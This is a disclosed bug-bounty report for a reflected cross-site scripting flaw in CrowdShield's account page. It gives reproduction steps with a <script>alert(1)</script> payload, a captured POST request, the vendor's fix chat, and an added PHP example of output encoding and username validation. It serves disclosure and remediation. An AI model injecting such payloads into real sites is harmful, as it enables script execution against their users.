Reflected Cross Site Scripting

Severity: Medium
Bug ID: 659
Researcher: pratap
Status: Disclosed
Submitted: 12/16/2014

Description:

An XSS Vulnerability exists in the account page.

Steps to Reproduce:

1. Click on create a researcher account.
2. Select username as <script>alert(1);</script>
3. Click on create account. When the successful creation page is displayed, click on browser back button.
4. Reload the page and XSS is triggered.

Affected URL:

http://crowdshield.com/account.php

Affected Params:

researcher_username

Bug Evidence:

POST /account.php HTTP/1.1
Host: crowdshield.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://crowdshield.com/account.php
Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=242435792.48.10.1418758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36




Bug Recommendation:

Sanitize evil input.

Direct Chat

pratap 12/16/2014
Submitted bug ID: 659 - Cross Site Scripting bug to CrowdShield
CrowdShield 12/16/2014
Acknowledged bug ID: 659 - Cross Site Scripting submitted by Pratap and awarded 20 points!
CrowdShield 12/16/2014
Fixed bug ID: 659 - Cross Site Scripting submitted by Pratap
CrowdShield 12/16/2014
Nice find! We accidentally left in echo $researcher_username for debugging and forgot to remove it... should be good now though.
CrowdShield 06/24/2015
disclosed a Cross Site Scripting bug submitted by Pratap
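
The cause named in the chat (a leftover echo of $researcher_username) next to the output-encoding and input-validation fixes that the recommendation points at, as an added PHP example that is not CrowdShield's code. The request body is cut down from the bug evidence above; the helper names h() and is_valid_username() and the username policy are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed input: the reflected parameter exactly as it appears in the
// POST body of the bug evidence (other fields dropped for brevity).
$rawBody = 'researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E';

// parse_str() URL-decodes the body the same way PHP fills $_POST.
parse_str($rawBody, $post);
$researcher_username = is_string($post['researcher_username'] ?? null)
    ? $post['researcher_username']
    : '';

// "Before": what a bare `echo $researcher_username;` writes into the page.
// The decoded value goes into the HTML unchanged, so the markup is live.
$before = $researcher_username;

// "After", output side: encode for an HTML body or quoted-attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "After", input side: allow-list check at account creation.
// Assumed policy (not from the page): 3 to 32 characters of [A-Za-z0-9_.-].
// \A and \z anchor the whole string, so a trailing newline cannot slip through.
function is_valid_username(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{3,32}\z/', $name) === 1;
}

$after = h($researcher_username);

printf("raw echo      : %s\n", $before);
printf("encoded echo  : %s\n", $after);
printf("accepted name : %s\n", is_valid_username($researcher_username) ? 'yes' : 'no');
printf("accepted name : %s\n", is_valid_username('pratap') ? 'yes' : 'no');
```

Encoding at output is the control that closes the reflection; the allow-list only narrows what can be stored and does not replace it.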

Pending Bugs

ID | Severity | Vulnerability | User | Date | Status
692 | High | Authentication Bypass | dia2diab | 07/01/2015 | Disclosed
778 | High | Privilege Escalation | poseidon | 08/24/2018 | Disclosed
641 | High | Privilege Escalation | daksh | 12/05/2014 | Disclosed
744 | High | Privilege Escalation | realn0j | 09/06/2017 | Disclosed
670 | High | Remote Code Execution | zoczus | 05/06/2015 | Disclosed
593 | Medium | Buffer Overflow | rockcena | 12/01/2014 | Disclosed
578 | Medium | Cross Site Request Forgery | sandeepv | 11/30/2014 | Disclosed
580 | Medium | Cross Site Request Forgery | sandeepv | 11/30/2014 | Disclosed
659 | Medium | Reflected Cross Site Scripting | pratap | 12/16/2014 | Disclosed
742 | Low | Application Errors | guifre | 07/29/2017 | Disclosed
724 | Low | Session Security and Cookies | testingcs | 04/24/2016 | Disclosed
706 | Informational | Other | zediwon | 09/28/2015 | Disclosed
707 | Informational | Other | behroz | 10/06/2015 | Disclosed